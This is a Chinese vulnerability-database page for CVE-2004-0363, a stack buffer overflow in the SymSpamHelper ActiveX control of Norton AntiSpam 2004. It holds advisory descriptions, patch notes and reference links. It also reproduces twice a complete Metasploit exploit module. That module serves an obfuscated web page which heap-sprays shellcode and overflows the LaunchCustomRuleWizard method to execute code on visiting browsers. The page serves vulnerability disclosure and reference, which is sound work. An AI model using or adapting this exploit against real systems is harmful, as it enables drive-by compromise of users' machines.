CVE-2004-0363
CVSS7.5
发布时间 :2004-04-15 00:00:00
修订时间 :2016-10-17 22:44:40
NMCOEPS    

[原文]Stack-based buffer overflow in the SymSpamHelper ActiveX component (symspam.dll) in Norton AntiSpam 2004, as used in Norton Internet Security 2004, allows remote attackers to execute arbitrary code via a long parameter to the LaunchCustomRuleWizard method.


[CNNVD]Symantec Norton AntiSpam远程缓冲区溢出漏洞(CNNVD-200404-065)

        
        Symantec's Norton AntiSpamT 2004 可以过滤垃圾邮件,可与任何POP3邮件程序工作。
        Norton Internet Security 2004包含的SymSpamHelper类ActiveX组件存在安全问题,远程攻击者可以利用这个漏洞进行远程缓冲区溢出攻击,可能以用户进程权限在系统上执行任意指令。
        SymSpamHelper类(c:\program files\common
        files\symantec shared\antispam\symspam.dll)是Norton AntiSpam安装的ActiveX组件。其中存在安全漏洞,使用带有超长参数的LaunchCustomRuleWizard方法,攻击者可以进行基于堆栈的缓冲区溢出,可导致以用户进程权限在系统上执行任意指令。攻击者可通过构建恶意页面,或发送恶意HTML形式EMAIL触发此漏洞。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0363
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0363
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200404-065
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107970870606638&w=2
(UNKNOWN)  BUGTRAQ  20040319 Norton AntiSpam Remote Buffer Overrun (#NISR19042004a)
http://marc.info/?l=bugtraq&m=107980262324362&w=2
(UNKNOWN)  BUGTRAQ  20040319 Ref: NGSSoftware Advisories NISR19042004a and NISR19042004b
http://www.kb.cert.org/vuls/id/344718
(UNKNOWN)  CERT-VN  VU#344718
http://www.nextgenss.com/advisories/antispam.txt
(VENDOR_ADVISORY)  MISC  http://www.nextgenss.com/advisories/antispam.txt
http://www.sarc.com/avcenter/security/Content/2004.03.19.html
(UNKNOWN)  CONFIRM  http://www.sarc.com/avcenter/security/Content/2004.03.19.html
http://www.securityfocus.com/bid/9916
(VENDOR_ADVISORY)  BID  9916
http://xforce.iss.net/xforce/xfdb/15536
(VENDOR_ADVISORY)  XF  nas-launchcustomrulewizard-bo(15536)

- 漏洞信息

Symantec Norton AntiSpam远程缓冲区溢出漏洞
高危 边界条件错误
2004-04-15 00:00:00 2005-10-20 00:00:00
远程  
        
        Symantec's Norton AntiSpamT 2004 可以过滤垃圾邮件,可与任何POP3邮件程序工作。
        Norton Internet Security 2004包含的SymSpamHelper类ActiveX组件存在安全问题,远程攻击者可以利用这个漏洞进行远程缓冲区溢出攻击,可能以用户进程权限在系统上执行任意指令。
        SymSpamHelper类(c:\program files\common
        files\symantec shared\antispam\symspam.dll)是Norton AntiSpam安装的ActiveX组件。其中存在安全漏洞,使用带有超长参数的LaunchCustomRuleWizard方法,攻击者可以进行基于堆栈的缓冲区溢出,可导致以用户进程权限在系统上执行任意指令。攻击者可通过构建恶意页面,或发送恶意HTML形式EMAIL触发此漏洞。
        

- 公告与补丁

        厂商补丁:
        Symantec
        --------
        打开Norton AntiSpam或Norton Internet Security / Professional ,选择LiveUpdate升级程序。

- 漏洞信息 (16595)

Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow (EDBID:16595)
windows remote
2010-05-09 Verified
0 metasploit
N/A [点击下载]
##
# $Id: nis2004_antispam.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Norton AntiSpam 2004. When
				sending an overly long string to the LaunchCustomRuleWizard() method
				of symspam.dll (2004.1.0.147) an attacker may be able to execute
				arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'MC' ],
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2004-0363' ],
					[ 'OSVDB', '6249' ],
					[ 'BID', '9916' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'         => 1024,
					'BadChars'      => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
				],
			'DisclosureDate' => 'Mar 19 2004',
			'DefaultTarget'  => 0))
	end

	def autofilter
		false
	end

	def check_dependencies
		use_zlib
	end

	def on_request_uri(cli, request)
		# Re-generate the payload.
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode.
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		# Set the return.
		ret     = Rex::Text.uri_encode([target.ret].pack('L'))

		js = %Q|
		try {
				var evil_string = "";
				var index;
				var vulnerable = new ActiveXObject('SymSpamBlockingUI.SymSpamHelper.1');
				var my_unescape = unescape;
				var shellcode = '#{shellcode}';
				#{js_heap_spray}
				sprayHeap(my_unescape(shellcode), #{target.ret}, 0x40000);
				for (index = 0; index < 2024; index++) {
					evil_string = evil_string + my_unescape('#{ret}');
				}
				vulnerable.LaunchCustomRuleWizard(evil_string);
			} catch( e ) { window.location = 'about:blank' ; }
		|

		opts = {
			'Strings' => true,
			'Symbols' => {
				'Variables' => [
					'vulnerable',
					'shellcode',
					'my_unescape',
					'index',
					'evil_string',
				]
			}
		}
		js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
		js.update_opts(js_heap_spray.opts)
		js.obfuscate()
		content = %Q|<html>
<body>
<script><!--
#{js}
//</script>
</body>
</html>
|

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
		

- 漏洞信息 (F83053)

Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow (PacketStormID:F83053)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,arbitrary
CVE-2004-0363
[点击下载]

This Metasploit module exploits a stack overflow in Norton AntiSpam 2004. When sending an overly long string to the LaunchCustomRuleWizard() method of symspam.dll (2004.1.0.147) an attacker may be able to execute arbitrary code.

###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack overflow in Norton AntiSpam 2004. When
					sending an overly long string to the LaunchCustomRuleWizard() method 
					of symspam.dll (2004.1.0.147) an attacker may be able to execute 
					arbitrary code. 
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'MC' ], 
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '2004-0363' ],
					[ 'OSVDB', '6249' ],
					[ 'BID', '9916' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'         => 1024,
					'BadChars'      => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]	
				],
			'DisclosureDate' => 'Mar 19 2004',
			'DefaultTarget'  => 0))
	end

	def autofilter
		false
	end

	def check_dependencies
		use_zlib
	end

	def on_request_uri(cli, request)
		# Re-generate the payload.
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode.
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
		
		# Set the return.
		ret     = Rex::Text.uri_encode([target.ret].pack('L'))
		
		js = %Q|
			try {
				var evil_string = "";
				var index;
				var vulnerable = new ActiveXObject('SymSpamBlockingUI.SymSpamHelper.1');
				var my_unescape = unescape;
				var shellcode = '#{shellcode}';
				#{js_heap_spray}
				sprayHeap(my_unescape(shellcode), #{target.ret}, 0x40000);
				for (index = 0; index < 2024; index++) {
					evil_string = evil_string + my_unescape('#{ret}');
				}
				vulnerable.LaunchCustomRuleWizard(evil_string);
			} catch( e ) { window.location = 'about:blank' ; }
		|

		opts = {
			'Strings' => true,
			'Symbols' => {
				'Variables' => [ 
					'vulnerable',
					'shellcode',
					'my_unescape',
					'index',
					'evil_string',
				]
			}
		}
		js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
		js.update_opts(js_heap_spray.opts)
		js.obfuscate()
		content = %Q|
			<html>
			<body>
				<script><!--
				#{js}
				//</script>
			</body>
			</html>
            |

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
		
		# Handle the payload
		handler(cli)
	end

end
    

- 漏洞信息

6249
Symantec Norton AntiSpam 2004 SymSpamHelper ActiveX (symspam.dll) LaunchCustomRuleWizard Method Overflow
Remote / Network Access, Context Dependent Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial

- 漏洞描述

A remote overflow exists in Symantec Norton AntiSpam. The SymSpamHelper Class (symspam.dll) ActiveX component fails to perform proper bounds checking resulting in a buffer overflow. By supplying an overly long string to the LaunchCustomRuleWizard method, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2004-03-19 2004-03-04
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Symantec has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Symantec Norton AntiSpam SymSpamHelper Class Buffer Overrun Vulnerability
Boundary Condition Error 9916
Yes No
2004-03-19 12:00:00 2009-07-12 03:06:00
Discovery is credited to Mark Litchfield.

- 受影响的程序版本

Symantec Norton AntiSpam 2004
+ Symantec Norton Internet Security 2004
+ Symantec Norton Internet Security 2004 Professional Edition

- 漏洞讨论

Symantec Norton AntiSpam has been reported prone to a remotely exploitable buffer overrun vulnerability.

This issue exists in the SymSpamHelper Class ActiveX component, which could be invoked from a web page or HTML e-mail with malformed parameters sufficient to trigger the condition. This could be exploited to execute arbitrary code with the privileges of the client user.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;.

- 解决方案

Symantec has released advisory SYM04-005 relating to this issue. Please see the reference section for more information.

Fixes for this issue may be applied via LiveUpdate.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站